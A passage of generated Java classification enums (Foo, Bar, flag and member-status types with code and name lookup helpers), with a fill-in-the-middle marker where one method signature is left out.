* Find the classification by the name. (CaseInsensitive)
* @param name The string of name, which is case-insensitive. (NotNull)
* @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<DeprecatedMapBasicType> byName(String name) {
if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification name: " + name);
});
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
* Get the classification by the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
*/
public static DeprecatedMapBasicType codeOf(Object code) {
if (code == null) { return null; }
if (code instanceof DeprecatedMapBasicType) { return (DeprecatedMapBasicType)code; }
return _codeClsMap.get(code.toString().toLowerCase());
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
* Get the classification by the name (also called 'value' in ENUM world).
* @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
*/
public static DeprecatedMapBasicType nameOf(String name) {
if (name == null) { return null; }
try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
}
/**
* Get the list of all classification elements. (returns new copied list)
* @return The snapshot list of all classification elements. (NotNull)
*/
public static List<DeprecatedMapBasicType> listAll() {
return new ArrayList<DeprecatedMapBasicType>(Arrays.asList(values()));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
*/
public static List<DeprecatedMapBasicType> listByGroup(String groupName) {
if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
throw new ClassificationNotFoundException("Unknown classification group: DeprecatedMapBasicType." + groupName);
}
/**
* Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
* @param codeList The list of plain code, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
*/
public static List<DeprecatedMapBasicType> listOf(Collection<String> codeList) {
if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
List<DeprecatedMapBasicType> clsList = new ArrayList<DeprecatedMapBasicType>(codeList.size());
for (String code : codeList) { clsList.add(of(code).get()); }
return clsList;
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
*/
public static List<DeprecatedMapBasicType> groupOf(String groupName) {
return new ArrayList<DeprecatedMapBasicType>(4);
}
@Override public String toString() { return code(); }
}
/**
* has deprecated element
*/
public enum DeprecatedMapCollaborationType implements CDef {
/** FooName */
FooName("FOO", "FooName", emptyStrings())
,
/** BarBar: here (deprecated: test of deprecated) */
@Deprecated
BarName("BAR", "BarBar", emptyStrings())
,
/** QuxQux: (deprecated: no original comment) */
@Deprecated
QuxName("QUX", "QuxQux", emptyStrings())
;
private static final Map<String, DeprecatedMapCollaborationType> _codeClsMap = new HashMap<String, DeprecatedMapCollaborationType>();
private static final Map<String, DeprecatedMapCollaborationType> _nameClsMap = new HashMap<String, DeprecatedMapCollaborationType>();
static {
for (DeprecatedMapCollaborationType value : values()) {
_codeClsMap.put(value.code().toLowerCase(), value);
for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
_nameClsMap.put(value.name().toLowerCase(), value);
}
}
private String _code; private String _alias; private Set<String> _sisterSet;
private DeprecatedMapCollaborationType(String code, String alias, String[] sisters)
{ _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
public String code() { return _code; } public String alias() { return _alias; }
public Set<String> sisterSet() { return _sisterSet; }
public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
public ClassificationMeta meta() { return CDef.DefMeta.DeprecatedMapCollaborationType; }
/**
* Is the classification in the group? <br>
* contains deprecated element here <br>
* The group elements:[FooName, BarName]
* @return The determination, true or false.
*/
public boolean isContainsDeprecated() {
return FooName.equals(this) || BarName.equals(this);
}
public boolean inGroup(String groupName) {
if ("containsDeprecated".equals(groupName)) { return isContainsDeprecated(); }
return false;
}
/**
* Get the classification of the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
* @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<DeprecatedMapCollaborationType> of(Object code) {
if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
if (code instanceof DeprecatedMapCollaborationType) { return OptionalThing.of((DeprecatedMapCollaborationType)code); }
if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification code: " + code);
});
}
/**
* Find the classification by the name. (CaseInsensitive)
* @param name The string of name, which is case-insensitive. (NotNull)
* @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<DeprecatedMapCollaborationType> byName(String name) {
if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification name: " + name);
});
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
* Get the classification by the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
*/
public static DeprecatedMapCollaborationType codeOf(Object code) {
if (code == null) { return null; }
if (code instanceof DeprecatedMapCollaborationType) { return (DeprecatedMapCollaborationType)code; }
return _codeClsMap.get(code.toString().toLowerCase());
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
* Get the classification by the name (also called 'value' in ENUM world).
* @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
*/
public static DeprecatedMapCollaborationType nameOf(String name) {
if (name == null) { return null; }
try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
}
/**
* Get the list of all classification elements. (returns new copied list)
* @return The snapshot list of all classification elements. (NotNull)
*/
public static List<DeprecatedMapCollaborationType> listAll() {
return new ArrayList<DeprecatedMapCollaborationType>(Arrays.asList(values()));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
*/
public static List<DeprecatedMapCollaborationType> listByGroup(String groupName) {
if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
if ("containsDeprecated".equalsIgnoreCase(groupName)) { return listOfContainsDeprecated(); }
throw new ClassificationNotFoundException("Unknown classification group: DeprecatedMapCollaborationType." + groupName);
}
/**
* Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
* @param codeList The list of plain code, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
*/
public static List<DeprecatedMapCollaborationType> listOf(Collection<String> codeList) {
if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
List<DeprecatedMapCollaborationType> clsList = new ArrayList<DeprecatedMapCollaborationType>(codeList.size());
for (String code : codeList) { clsList.add(of(code).get()); }
return clsList;
}
/**
* Get the list of group classification elements. (returns new copied list) <br>
* contains deprecated element here <br>
* The group elements:[FooName, BarName]
* @return The snapshot list of classification elements in the group. (NotNull)
*/
public static List<DeprecatedMapCollaborationType> listOfContainsDeprecated() {
return new ArrayList<DeprecatedMapCollaborationType>(Arrays.asList(FooName, BarName));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
*/
public static List<DeprecatedMapCollaborationType> groupOf(String groupName) {
if ("containsDeprecated".equals(groupName)) { return listOfContainsDeprecated(); }
return new ArrayList<DeprecatedMapCollaborationType>(4);
}
@Override public String toString() { return code(); }
}
/**
* unique key as classification
*/
public enum UQClassificationType implements CDef {
;
private static final Map<String, UQClassificationType> _codeClsMap = new HashMap<String, UQClassificationType>();
private static final Map<String, UQClassificationType> _nameClsMap = new HashMap<String, UQClassificationType>();
static {
for (UQClassificationType value : values()) {
_codeClsMap.put(value.code().toLowerCase(), value);
for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
_nameClsMap.put(value.name().toLowerCase(), value);
}
}
private String _code; private String _alias; private Set<String> _sisterSet;
private UQClassificationType(String code, String alias, String[] sisters)
{ _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
public String code() { return _code; } public String alias() { return _alias; }
public Set<String> sisterSet() { return _sisterSet; }
public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
public ClassificationMeta meta() { return CDef.DefMeta.UQClassificationType; }
public boolean inGroup(String groupName) {
return false;
}
/**
* Get the classification of the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
* @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<UQClassificationType> of(Object code) {
if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
if (code instanceof UQClassificationType) { return OptionalThing.of((UQClassificationType)code); }
if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification code: " + code);
});
}
/**
* Find the classification by the name. (CaseInsensitive)
* @param name The string of name, which is case-insensitive. (NotNull)
* @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<UQClassificationType> byName(String name) {
if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification name: " + name);
});
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
* Get the classification by the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
*/
public static UQClassificationType codeOf(Object code) {
if (code == null) { return null; }
if (code instanceof UQClassificationType) { return (UQClassificationType)code; }
return _codeClsMap.get(code.toString().toLowerCase());
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
* Get the classification by the name (also called 'value' in ENUM world).
* @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
*/
public static UQClassificationType nameOf(String name) {
if (name == null) { return null; }
try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
}
/**
* Get the list of all classification elements. (returns new copied list)
* @return The snapshot list of all classification elements. (NotNull)
*/
public static List<UQClassificationType> listAll() {
return new ArrayList<UQClassificationType>(Arrays.asList(values()));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
*/
public static List<UQClassificationType> listByGroup(String groupName) {
if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
throw new ClassificationNotFoundException("Unknown classification group: UQClassificationType." + groupName);
}
/**
* Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
* @param codeList The list of plain code, which is case-insensitive. (NotNull)
<|fim▁hole|> if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
List<UQClassificationType> clsList = new ArrayList<UQClassificationType>(codeList.size());
for (String code : codeList) { clsList.add(of(code).get()); }
return clsList;
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
*/
public static List<UQClassificationType> groupOf(String groupName) {
return new ArrayList<UQClassificationType>(4);
}
@Override public String toString() { return code(); }
}
/**
* Classification of Bar
*/
public enum BarCls implements CDef {
/** BarOne: BarOne */
BarOne("B01", "BarOne", emptyStrings())
,
/** BarTwo: BarTwo */
BarTwo("B02", "BarTwo", emptyStrings())
,
/** BarThree: BarThree */
BarThree("B03", "BarThree", emptyStrings())
,
/** BarFour: BarFour */
BarFour("B04", "BarFour", emptyStrings())
,
/** BarFive: BarFive */
BarFive("B05", "BarFive", emptyStrings())
;
private static final Map<String, BarCls> _codeClsMap = new HashMap<String, BarCls>();
private static final Map<String, BarCls> _nameClsMap = new HashMap<String, BarCls>();
static {
for (BarCls value : values()) {
_codeClsMap.put(value.code().toLowerCase(), value);
for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
_nameClsMap.put(value.name().toLowerCase(), value);
}
}
private String _code; private String _alias; private Set<String> _sisterSet;
private BarCls(String code, String alias, String[] sisters)
{ _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
public String code() { return _code; } public String alias() { return _alias; }
public Set<String> sisterSet() { return _sisterSet; }
public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
public ClassificationMeta meta() { return CDef.DefMeta.BarCls; }
public boolean inGroup(String groupName) {
return false;
}
/**
* Get the classification of the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
* @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<BarCls> of(Object code) {
if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
if (code instanceof BarCls) { return OptionalThing.of((BarCls)code); }
if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification code: " + code);
});
}
/**
* Find the classification by the name. (CaseInsensitive)
* @param name The string of name, which is case-insensitive. (NotNull)
* @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<BarCls> byName(String name) {
if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification name: " + name);
});
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
* Get the classification by the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
*/
public static BarCls codeOf(Object code) {
if (code == null) { return null; }
if (code instanceof BarCls) { return (BarCls)code; }
return _codeClsMap.get(code.toString().toLowerCase());
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
* Get the classification by the name (also called 'value' in ENUM world).
* @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
*/
public static BarCls nameOf(String name) {
if (name == null) { return null; }
try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
}
/**
* Get the list of all classification elements. (returns new copied list)
* @return The snapshot list of all classification elements. (NotNull)
*/
public static List<BarCls> listAll() {
return new ArrayList<BarCls>(Arrays.asList(values()));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
*/
public static List<BarCls> listByGroup(String groupName) {
if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
throw new ClassificationNotFoundException("Unknown classification group: BarCls." + groupName);
}
/**
* Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
* @param codeList The list of plain code, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
*/
public static List<BarCls> listOf(Collection<String> codeList) {
if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
List<BarCls> clsList = new ArrayList<BarCls>(codeList.size());
for (String code : codeList) { clsList.add(of(code).get()); }
return clsList;
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
*/
public static List<BarCls> groupOf(String groupName) {
return new ArrayList<BarCls>(4);
}
@Override public String toString() { return code(); }
}
/**
* Classification of Foo
*/
public enum FooCls implements CDef {
/** FooOne: FooOne */
FooOne("F01", "FooOne", emptyStrings())
,
/** FooTwo: FooTwo */
FooTwo("F02", "FooTwo", emptyStrings())
,
/** FooThree: FooThree */
FooThree("F03", "FooThree", emptyStrings())
,
/** FooFour: FooFour */
FooFour("F04", "FooFour", emptyStrings())
;
private static final Map<String, FooCls> _codeClsMap = new HashMap<String, FooCls>();
private static final Map<String, FooCls> _nameClsMap = new HashMap<String, FooCls>();
static {
for (FooCls value : values()) {
_codeClsMap.put(value.code().toLowerCase(), value);
for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
_nameClsMap.put(value.name().toLowerCase(), value);
}
}
private String _code; private String _alias; private Set<String> _sisterSet;
private FooCls(String code, String alias, String[] sisters)
{ _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
public String code() { return _code; } public String alias() { return _alias; }
public Set<String> sisterSet() { return _sisterSet; }
public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
public ClassificationMeta meta() { return CDef.DefMeta.FooCls; }
public boolean inGroup(String groupName) {
return false;
}
/**
* Get the classification of the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
* @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<FooCls> of(Object code) {
if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
if (code instanceof FooCls) { return OptionalThing.of((FooCls)code); }
if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification code: " + code);
});
}
/**
* Find the classification by the name. (CaseInsensitive)
* @param name The string of name, which is case-insensitive. (NotNull)
* @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<FooCls> byName(String name) {
if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification name: " + name);
});
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
* Get the classification by the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
*/
public static FooCls codeOf(Object code) {
if (code == null) { return null; }
if (code instanceof FooCls) { return (FooCls)code; }
return _codeClsMap.get(code.toString().toLowerCase());
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
* Get the classification by the name (also called 'value' in ENUM world).
* @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
*/
public static FooCls nameOf(String name) {
if (name == null) { return null; }
try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
}
/**
* Get the list of all classification elements. (returns new copied list)
* @return The snapshot list of all classification elements. (NotNull)
*/
public static List<FooCls> listAll() {
return new ArrayList<FooCls>(Arrays.asList(values()));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
*/
public static List<FooCls> listByGroup(String groupName) {
if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
throw new ClassificationNotFoundException("Unknown classification group: FooCls." + groupName);
}
/**
* Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
* @param codeList The list of plain code, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
*/
public static List<FooCls> listOf(Collection<String> codeList) {
if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
List<FooCls> clsList = new ArrayList<FooCls>(codeList.size());
for (String code : codeList) { clsList.add(of(code).get()); }
return clsList;
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
*/
public static List<FooCls> groupOf(String groupName) {
return new ArrayList<FooCls>(4);
}
@Override public String toString() { return code(); }
}
/**
* フラグを示す
*/
public enum Flg implements CDef {
/** はい: 有効を示す */
True("1", "はい", emptyStrings())
,
/** いいえ: 無効を示す */
False("0", "いいえ", emptyStrings())
;
private static final Map<String, Flg> _codeClsMap = new HashMap<String, Flg>();
private static final Map<String, Flg> _nameClsMap = new HashMap<String, Flg>();
static {
for (Flg value : values()) {
_codeClsMap.put(value.code().toLowerCase(), value);
for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
_nameClsMap.put(value.name().toLowerCase(), value);
}
}
private String _code; private String _alias; private Set<String> _sisterSet;
private Flg(String code, String alias, String[] sisters)
{ _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
public String code() { return _code; } public String alias() { return _alias; }
public Set<String> sisterSet() { return _sisterSet; }
public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
public ClassificationMeta meta() { return CDef.DefMeta.Flg; }
public boolean inGroup(String groupName) {
return false;
}
/**
* Get the classification of the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
* @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<Flg> of(Object code) {
if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
if (code instanceof Flg) { return OptionalThing.of((Flg)code); }
if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification code: " + code);
});
}
/**
* Find the classification by the name. (CaseInsensitive)
* @param name The string of name, which is case-insensitive. (NotNull)
* @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<Flg> byName(String name) {
if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification name: " + name);
});
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
* Get the classification by the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
*/
public static Flg codeOf(Object code) {
if (code == null) { return null; }
if (code instanceof Flg) { return (Flg)code; }
return _codeClsMap.get(code.toString().toLowerCase());
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
* Get the classification by the name (also called 'value' in ENUM world).
* @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
*/
public static Flg nameOf(String name) {
if (name == null) { return null; }
try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
}
/**
* Get the list of all classification elements. (returns new copied list)
* @return The snapshot list of all classification elements. (NotNull)
*/
public static List<Flg> listAll() {
return new ArrayList<Flg>(Arrays.asList(values()));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
*/
public static List<Flg> listByGroup(String groupName) {
if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
throw new ClassificationNotFoundException("Unknown classification group: Flg." + groupName);
}
/**
* Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
* @param codeList The list of plain code, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
*/
public static List<Flg> listOf(Collection<String> codeList) {
if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
List<Flg> clsList = new ArrayList<Flg>(codeList.size());
for (String code : codeList) { clsList.add(of(code).get()); }
return clsList;
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
*/
public static List<Flg> groupOf(String groupName) {
return new ArrayList<Flg>(4);
}
@Override public String toString() { return code(); }
}
/**
* 会員ステータス: 会員の状態を示す
*/
public enum MemberStatus implements CDef {
/** 正式会員: 正式な会員を示す */
Formalized("FML", "正式会員", emptyStrings())
,
/** 仮会員: 仮の会員を示す */
Provisional("PRV", "仮会員", emptyStrings())
,
/** 退会会員: 退会した会員を示す */
Withdrawal("WDL", "退会会員", emptyStrings())
;
private static final Map<String, MemberStatus> _codeClsMap = new HashMap<String, MemberStatus>();
private static final Map<String, MemberStatus> _nameClsMap = new HashMap<String, MemberStatus>();
static {
for (MemberStatus value : values()) {
_codeClsMap.put(value.code().toLowerCase(), value);
for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
_nameClsMap.put(value.name().toLowerCase(), value);
}
}
private String _code; private String _alias; private Set<String> _sisterSet;
private MemberStatus(String code, String alias, String[] sisters)
{ _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
public String code() { return _code; } public String alias() { return _alias; }
public Set<String> sisterSet() { return _sisterSet; }
public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
public ClassificationMeta meta() { return CDef.DefMeta.MemberStatus; }
public boolean inGroup(String groupName) {
return false;
}
/**
* Get the classification of the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
* @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<MemberStatus> of(Object code) {
if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
if (code instanceof MemberStatus) { return OptionalThing.of((MemberStatus)code); }
if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification code: " + code);
});
}
/**
* Find the classification by the name. (CaseInsensitive)
* @param name The string of name, which is case-insensitive. (NotNull)
* @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<MemberStatus> byName(String name) {
if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification name: " + name);
});
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
* Get the classification by the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
*/
public static MemberStatus codeOf(Object code) {
if (code == null) { return null; }
if (code instanceof MemberStatus) { return (MemberStatus)code; }
return _codeClsMap.get(code.toString().toLowerCase());
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
* Get the classification by the name (also called 'value' in ENUM world).
* @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
*/
public static MemberStatus nameOf(String name) {
if (name == null) { return null; }
try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
}
/**
* Get the list of all classification elements. (returns new copied list)
* @return The snapshot list of all classification elements. (NotNull)
*/
public static List<MemberStatus> listAll() {
return new ArrayList<MemberStatus>(Arrays.asList(values()));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
*/
public static List<MemberStatus> listByGroup(String groupName) {
if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
